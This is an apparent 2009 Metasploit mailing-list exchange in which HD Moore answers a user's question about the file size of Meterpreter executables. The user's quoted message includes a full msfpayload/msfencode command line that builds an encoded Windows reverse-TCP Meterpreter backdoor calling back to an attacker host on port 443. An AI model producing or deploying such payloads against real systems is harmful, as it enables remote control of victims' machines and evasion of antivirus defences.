Meterpreter + SSL

[hdm at metasploit.com (HD Moore)]

On Mon, 06 Jul 2009 22:09:35 -0500, Willard Dawson  
<wfdawson at bellsouth.net> wrote:

> That's cool.  I wonder, though...
>
> Today, for the first time in a week or more, I used msfencode and
> shikata_ga_nai to make another instance of an .exe:
>
> ./msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 R |
> ./msfencode -e x86/shikata_ga_nai -c 4 -t exe -o rv_443.exe
>
> The resulting binary file was quite a bit larger than previously.

[..]

> That is, it's feasible when the .scr file is only 112 lines, as was the  
> case until recently.  Now, my work results in a 600+ line file.  I  
> certainly
> won't be manipulating that sort of file manually!


The generated executable size has only changed from ~9k to ~10k in the  
recent months. The new SSL code is loaded at runtime over the network and  
does not affect the size of the generated executable. It sounds like  
something else may be the cause of the dramatic size increase you are  
seeing.

-HD